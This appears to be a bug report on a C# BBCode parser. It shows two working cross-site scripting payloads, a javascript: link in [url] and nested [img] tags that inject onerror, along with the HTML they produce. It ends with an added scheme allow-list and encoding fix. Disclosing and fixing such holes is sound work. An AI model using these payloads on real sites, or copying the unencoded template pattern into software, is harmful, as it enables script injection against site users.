XSS possible via img and url tags


Using the demo code for the project shown on the home page, it is possible to inject JavaScript into the page to be executed:

The parser is set up as:
    var parser = new BBCodeParser(new[]
        {
            new BBTag("b", "<b>", "</b>"),
            new BBTag("i", "<span style=\"font-style:italic;\">", "</span>"),
            new BBTag("u", "<span style=\"text-decoration:underline;\">", "</span>"),
            new BBTag("code", "<pre class=\"prettyprint\">", "</pre>"),
            // ${content} is substituted into the src attribute
            new BBTag("img", "<img src=\"${content}\" />", "", false, true),
            new BBTag("quote", "<blockquote>", "</blockquote>"),
            new BBTag("list", "<ul>", "</ul>"),
            new BBTag("*", "<li>", "</li>", true, false),
            // ${href} is substituted into the href attribute
            new BBTag("url", "<a href=\"${href}\">", "</a>", new BBAttribute("href", ""), new BBAttribute("href", "href")),
        });
The first test is a [url] as follows:
parser.ToHtml("[url href=javascript:document.body.innerHTML=String.fromCharCode(88,83,83)]bbcode[/url]")
Which results in the following HTML:
<a href="javascript:document.body.innerHTML=String.fromCharCode(88,83,83)">bbcodetest</a>
Clicking on this link will cause 'XSS' to be rendered to the page.

The second test is an [img] as follows:
parser.ToHtml("[img] [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]")
Which results in the following HTML:
<img src=" <img src=" onerror=javascript:alert(String.fromCharCode(88,83,83)) "/> " />
Which causes JavaScript to be executed.
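
One way to close both cases is to validate and encode a value before it is substituted into a src or href template. The following is an added example, not code from the BBCode project or from the original report; BBUrlGuard and ToSafeAttribute are hypothetical names, and the http/https allow-list is an assumption.

```csharp
using System;
using System.Net;

// Hypothetical helper (not part of the BBCode library): decides whether a
// value may be placed in a src/href attribute and encodes it if so.
static class BBUrlGuard
{
    // Assumption: only these schemes are acceptable for links and images.
    static readonly string[] AllowedSchemes = { "http", "https" };

    // Returns an attribute-safe URL, or null when the value must be rejected.
    public static string ToSafeAttribute(string raw)
    {
        if (string.IsNullOrWhiteSpace(raw)) return null;
        string candidate = raw.Trim();

        // Require an absolute URI so the scheme is explicit and can be checked.
        if (!Uri.TryCreate(candidate, UriKind.Absolute, out Uri uri)) return null;

        // Uri.Scheme is already lower-cased, so "JaVaScRiPt:" is caught too.
        if (Array.IndexOf(AllowedSchemes, uri.Scheme) < 0) return null;

        // Encode so that quotes, '<', '>' and '&' cannot end the attribute
        // or start a new tag inside the generated HTML.
        return WebUtility.HtmlEncode(uri.AbsoluteUri);
    }

    static void Main()
    {
        // The first two values are taken from the two tests in the report;
        // the third is a constructed benign URL containing characters
        // that need encoding.
        string[] samples =
        {
            "javascript:document.body.innerHTML=String.fromCharCode(88,83,83)",
            " [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] ",
            "https://example.com/a.png?x=1&y=\"2\"",
        };

        foreach (string s in samples)
        {
            string safe = ToSafeAttribute(s);
            Console.WriteLine(safe == null
                ? "rejected: " + s
                : "<img src=\"" + safe + "\" />");
        }
    }
}
```

A rejected value should be rendered as encoded plain text rather than dropped into the tag template.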